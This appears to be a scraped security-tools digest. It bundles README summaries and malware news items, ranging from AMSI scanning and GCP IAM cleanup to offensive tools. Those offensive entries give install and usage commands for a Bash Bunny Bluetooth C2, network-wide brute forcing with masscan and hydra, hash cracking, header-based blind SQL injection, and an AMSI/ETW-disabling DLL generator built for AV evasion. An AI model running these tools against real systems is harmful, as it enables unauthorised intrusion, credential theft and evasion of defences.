    Usage

    dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
    Risk Level Meaning
    0 AMSI_RESULT_CLEAN (File is clean)
    1 AMSI_RESULT_NOT_DETECTED (No threat detected)
    16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
    20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
    32768 AMSI_RESULT_DETECTED (File is considered malware)

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install required dependencies
    pip install pygatt "pygatt[GATTTOOL]"

    Make sure BlueZ is installed and gatttool is usable

    sudo apt install bluez
    1. Download BlueBunny's repository (and switch into the correct folder)
    git clone https://github.com/90N45-d3v/BlueBunny
    cd BlueBunny/C2
    1. Start the C2 server
    sudo python c2-server.py
    1. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
    2. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
    # Define the type of the data to send ("cmd" or "payload") (payload data will be temporary written to a file, to execute multiple commands like in a payload script file)
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



    PassBreaker - Command-line Password Cracking Tool Developed In Python

    By: Zion3R


    PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.Β 

    Features

    • Wordlist-based password cracking
    • Brute force password cracking
    • Support for multiple hash algorithms
    • Optional salt value
    • Parallel processing option for faster cracking
    • Password complexity evaluation
    • Customizable minimum and maximum password length
    • Customizable character set for brute force attacks

    Installation

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PassBreaker.git
    2. Install the required dependencies:

      pip install -r requirements.txt

    Usage

    python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

    Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

    Options

    • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
    • -s, --salt <salt>: Specify a salt value to use.
    • -p, --parallel: Enable parallel processing for faster cracking.
    • -c, --complexity: Evaluate password complexity before cracking.
    • -b, --brute-force: Perform a brute force attack.
    • --min-length <min_length>: Set the minimum password length for brute force attacks.
    • --max-length <max_length>: Set the maximum password length for brute force attacks.
    • --character-set <character_set>: Set the character set to use for brute force attacks.

    Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım ârneği:

    Usage Examples

    Wordlist-based Password Cracking

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

    This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

    Brute Force Attack

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

    This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

    Password Complexity Evaluation

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

    This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

    Using Salt Value

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

    This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

    Parallel Processing

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

    This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

    These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

    Disclaimer

    This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

    Contributing

    Contributions are welcome! To contribute to PassBreaker, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

    License

    PassBreaker is released under the MIT License. See LICENSE for more information.



    T3SF - Technical Tabletop Exercises Simulation Framework

    By: Zion3R


    T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL) together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module performs the communication with the specific module (Discord, Slack, Telegram, etc.) that allows the events to present the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".


    Getting Things Ready

    To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

    To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

    # Python 3.6+ required
    python -m venv .venv # We will create a python virtual environment
    source .venv/bin/activate # Let's get inside it

    pip install -U pip # Upgrade pip

    Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

    pip install "T3SF[Discord]"  # Install the framework to work with Discord

    or

    pip install "T3SF[Slack]"  # Install the framework to work with Slack

    This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

    We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

    Usage

    We created this framework to simplify all your work!

    Using Docker

    Supported Tags

    • slack β†’ This image has all the requirements to perform an exercise in Slack.
    • discord β†’ This image has all the requirements to perform an exercise in Discord.

    Using it with Slack

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

    Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

    Using it with Discord

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

    Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


    Once you have everything ready, use our template for the main.py, or modify the following code:

    Here is an example if you want to run the framework with the Discord bot and a GUI.

    from T3SF import T3SF
    import asyncio

    async def main():
    await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

    if __name__ == '__main__':
    asyncio.run(main())

    Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

    Yes, that simple!

    await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

    If you need more help, you can always check our documentation here!



    Mass-Bruter - Mass Bruteforce Network Protocols

    By: Zion3R


    Mass bruteforce network protocols

    Info

    Simple personal script to quickly mass bruteforce common services in a large scale of network.
    It will check for default credentials on ftp, ssh, mysql, mssql...etc.
    This was made for authorized red team penetration testing purpose only.


    How it works

    1. Use masscan(faster than nmap) to find alive hosts with common ports from network segment.
    2. Parse ips and ports from masscan result.
    3. Craft and run hydra commands to automatically bruteforce supported network services on devices.

    Requirements

    • Kali linux or any preferred linux distribution
    • Python 3.10+
    # Clone the repo
    git clone https://github.com/opabravo/mass-bruter
    cd mass-bruter

    # Install required tools for the script
    apt update && apt install seclists masscan hydra

    How To Use

    Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

    Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

    Ex: masscan_192.168.0.0-16.txt

    Example command:

    masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

    Example Resume Command:

    masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

    Command Options

    Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">
    β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
    └─# python3 mass_bruteforce.py
    Usage: [OPTIONS]

    Mass Bruteforce Script

    Options:
    -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
    mssql, postgres, oracle)
    -a, --all Brute all services(Very Slow)
    -s, --show Show result with successful login
    -f, --file-path PATH The directory or file that contains masscan result
    [default: ./result/masscan/]
    --help Show this message and exit.

    Quick Bruteforce Example:

    python3 mass_bruteforce.py -q -f ~/masscan_script.txt

    Fetch cracked credentials:

    python3 mass_bruteforce.py -s

    Todo

    • Migrate with dpl4hydra
    • Optimize the code and functions
    • MultiProcessing

    Any contributions are welcomed!



    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R

    Clean up of over permissioned IAM accounts on GCP infra in an automated way

    CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle Enforcement on GCP cloud infra. It enables DevOps and Security team to quickly clean up accounts in GCP infra that have granted permissions of more than what are required. CureIAM fetches the recommendations and insights from GCP IAM recommender, scores them and enforce those recommendations automatically on daily basic. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of GCP IAM recommender APIs and Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

    • Config driven : The entire workflow of CureIAM is config driven. Skip to Config section to know more about it.
    • Scalable : Its is designed to scale because of its plugin driven, multiprocess and multi-threaded approach.
    • Handles Scheduling: Scheduling part is embedded in CureIAM code itself, configure the time, and CureIAM will run daily at that time note.
    • Plugin driven: CureIAM codebase is completely plugin oriented, which means, one can plug and play the existing plugins or create new to add more functionality to it.
    • Track actionable insights: Every action that CureIAM takes, is recorded for audit purpose, It can do that in file store and in elasticsearch store. If you want you can build other store plugins to push that to other stores for tracking purposes.
    • Scoring and Enforcement: Every recommendation that is fetch by CureIAM is scored against various parameters, after that couple of scores like safe_to_apply_score, risk_score, over_privilege_score. Each score serves a different purpose. For safe_to_apply_score identifies the capability to apply recommendation on automated basis, based on the threshold set in CureIAM.yaml config file.

    Usage

    Since CureIAM is built with python, you can run it locally with these commands. Before running make sure to have a configuration file ready in either of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml and there is Service account JSON file present in current directory with name preferably cureiamSA.json. This SA private key can be named anything, but for docker image build, it is preferred to use this name. Make you to reference this file in config for GCP cloud.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

    # Run CureIAM process as schedular
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

    CureIAM can be also run inside a docker environment, this is completely optional and can be used for CI/CD with K8s cluster deployment.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

    # Run the image, as schedular
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

    CureIAM.yaml configuration file is the heart of CureIAM engine. Everything that engine does it does it based on the pipeline configured in this config file. Let's break this down in different sections to make this config look simpler.

    1. Let's configure first section, which is logging configuration and scheduler configuration.
      logger:
    version: 1

    disable_existing_loggers: false

    formatters:
    verysimple:
    format: >-
    [%(process)s]
    %(name)s:%(lineno)d - %(message)s
    datefmt: "%Y-%m-%d %H:%M:%S"

    handlers:
    rich_console:
    class: rich.logging.RichHandler
    formatter: verysimple

    file:
    class: logging.handlers.TimedRotatingFileHandler
    formatter: simple
    filename: /tmp/CureIAM.log
    when: midnight
    encoding: utf8
    backupCount: 5

    loggers:
    adal-python:
    level: INFO

    root:
    level: INFO
    handlers:
    - rich_console
    - file

    schedule: "16:00"

    This subsection of config uses, Rich logging module and schedules CureIAM to run daily at 16:00.

    1. Next section is configure different modules, which we MIGHT use in pipeline. This falls under plugins section in CureIAM.yaml. You can think of this section as declaration for different plugins.
      plugins:
    gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
    key_file_path: cureiamSA.json

    filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore

    gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
    mode_scan: true
    mode_enforce: true
    enforcer:
    key_file_path: cureiamSA.json
    allowlist_projects:
    - alpha
    blocklist_projects:
    - beta
    blocklist_accounts:
    - foo@bar.com
    allowlist_account_types:
    - user
    - group
    - serviceAccount
    blocklist_account_types:
    - None
    min_safe_to_apply_score_user: 0
    min_safe_to_apply_scor e_group: 0
    min_safe_to_apply_score_SA: 50

    esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
    # Change http to https later if your elastic are using https
    scheme: http
    host: es-host.com
    port: 9200
    index: cureiam-stg
    username: security
    password: securepassword

    Each of these plugins declaration has to be of this form:

      plugins:
    <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
    param1: val1
    param2: val2

    For example, for plugins CureIAM.stores.esstore.EsStore which is this file and class EsStore. All the params which are defined in yaml has to match the declaration in __init__() function of the same plugin class.

    1. Once plugins are defined , next step is to define how to define pipeline for auditing. And it goes like this:
      audits:
    IAMAudit:
    clouds:
    - gcpCloud
    processors:
    - gcpIamProcessor
    stores:
    - filestore
    - esstore

    Multiple Audits can be created out of this. The one created here is named IAMAudit with three plugins in use, gcpCloud, gcpIamProcessor, filestores and esstore. Note these are the same plugin names defined in Step 2. Again this is like defining the pipeline, not actually running it. It will be considered for running with definition in next step.

    1. Tell CureIAM to run the Audits defined in previous step.
      run:
    - IAMAudits

    And this makes the entire configuration for CureIAM, you can find the full sample here, this config driven pipeline concept is inherited from Cloudmarker framework.

    Dashboard

    The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

    Contribute

    [Please do!] We are looking for any kind of contribution to improve CureIAM's core funtionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo

    <>

    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

    • Breaking down the large code into multiple small function
    • Moving all plugins into plugins folder: Esstore, files, Cloud and GCP.
    • Adding fixes into zero divide issues
    • Migration to new major version of elastic
    • Change configuration in CureIAM.yaml file
    • Tested in python version 3.9.X

    Library Updates

    Adding the version in library to avoid any back compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Adding Docker Compose for local Elastic and Kibana in elastic
    • Adding .env-ex change .env-ex to .env to before running the docker
    Running docker compose: docker-compose -f docker_compose_es.yaml up 

    Features

    • Adding the capability to run scan without applying the recommendation. By default, if mode_scan is false, mode_enforce won't be running.
          mode_scan: true
    mode_enforce: false
    • Turn off the email function temporarily.


    MemTracer - Memory Scaner

    By: Zion3R


    MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. The MemTracer is implemented in Python language, aiming to detect reflectively loaded native .NET framework Dynamic-Link Library (DLL). This is achieved by looking for the following abnormal memory region’s characteristics:

    • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
    • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
    • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
    • The memory region contains a PE header.

    The tool starts by scanning the running processes, and by analyzing the allocated memory regions characteristics to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

    python.exe memScanner.py [-h] [-r] [-m MODULE]
    -h, --help show this help message and exit
    -r, --reflectiveScan Looking for reflective DLL loading
    -m MODULE, --module MODULE Looking for spcefic loaded DLL

    The script needs administrator privileges in order incepect all processes.



    LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

    By: Zion3R


    LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

    LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


    Features currently include:

    • XOR encoding for strings
    • WinAPI function name randomization
    • Multiple sandbox check options
    • Hardware breakpoint bypass option
     _______________________
    | |
    | AMSI + ETW |
    | |
    | LIGHTS OUT |
    | _______ |
    | || || |
    | ||_____|| |
    | |/ /|| |
    | / / || |
    | /____/ /-' |
    | |____|/ |
    | |
    | @icyguider |
    | |
    | RG|
    `-----------------------'
    usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

    Generate an obfuscated DLL that will disable AMSI & ETW

    options:
    -h, --help show this help message and exit
    -m <method>, --method <method>
    Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
    -s <option>, --sandbox &lt ;option>
    Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
    -sa <value>, --sandbox-arg <value>
    Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
    -k <key>, --key <key>
    Key to encode strings with (randomly generated by default)
    -o <outfile>, --outfile <outfile>
    File to save DLL to

    Remote options:
    -p <pid>, --pid <pid>
    PID of remote process to patch

    Intended Use/Opsec Considerations

    This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

    Usage Examples

    You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:

    Or even easier, copy powershell to an arbitrary location and side load the DLL!

    Greetz/Credit/Further Reference:



    27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts

    An unknown threat actor has been observed publishing typosquat packages to the Python Package Index (PyPI) repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 packages, which masqueraded as popular legitimate Python libraries, attracted thousands of downloads,

    Beware, Developers: BlazeStealer Malware Discovered in Python Packages on PyPI

    A new set of malicious Python packages has slithered their way to the Python Package Index (PyPI) repository with the ultimate aim of stealing sensitive information from compromised developer systems. The packages masquerade as seemingly innocuous obfuscation tools, but harbor a piece of malware calledΒ BlazeStealer, Checkmarx said in a report shared with The Hacker News. "[BlazeStealer]

    Trojanized PyCharm Software Version Delivered via Google Search Ads

    A newΒ malvertising campaignΒ has been observed capitalizing on a compromised website to promote spurious versions of PyCharm on Google search results by leveraging Dynamic Search Ads. "Unbeknownst to the site owner, one of their ads was automatically created to promote a popular program for Python developers, and visible to people doing a Google search for it," JΓ©rΓ΄me Segura, director of threat

    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R


    During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
    CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


    Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

    4 - Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
    #se/settings.py

    ELASTICSEARCH_DSL = {
    'default': {
    'hosts': 'localhost:9200'
    },
    }

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

    Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

    as an example searching for .mil data gives:

    searching for tesla as en example gives :

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

    • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

    By: Zion3R


    HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.Β 


    Disclaimer:

    This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

    The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

    Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

    By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

    Installation

    Install HBSQLI with following steps:

    $ git clone https://github.com/SAPT01/HBSQLI.git
    $ cd HBSQLI
    $ pip3 install -r requirements.txt

    Usage/Examples

    usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

    options:
    -h, --help show this help message and exit
    -l LIST, --list LIST To provide list of urls as an input
    -u URL, --url URL To provide single url as an input
    -p PAYLOADS, --payloads PAYLOADS
    To provide payload file having Blind SQL Payloads with delay of 30 sec
    -H HEADERS, --headers HEADERS
    To provide header file having HTTP Headers which are to be injected
    -v, --verbose Run on verbose mode

    For Single URL:

    $ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

    For List of URLs:

    $ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

    Modes

    There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command

    Notes

    • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

    • You can use the provided headers file or even some more custom header in that file itself according to your need.

    Demo



    Malicious NuGet Package Targeting .NET Developers with SeroXen RAT

    A malicious package hosted on the NuGet package manager for the .NET Framework has been found to deliver a remote access trojan called SeroXen RAT. The package, named Pathoschild.Stardew.Mod.Build.Config and published by a user namedΒ Disti, is a typosquat of a legitimate package calledΒ Pathoschild.Stardew.ModBuildConfig, software supply chain security firm PhylumΒ saidΒ in a report today. While
    ❌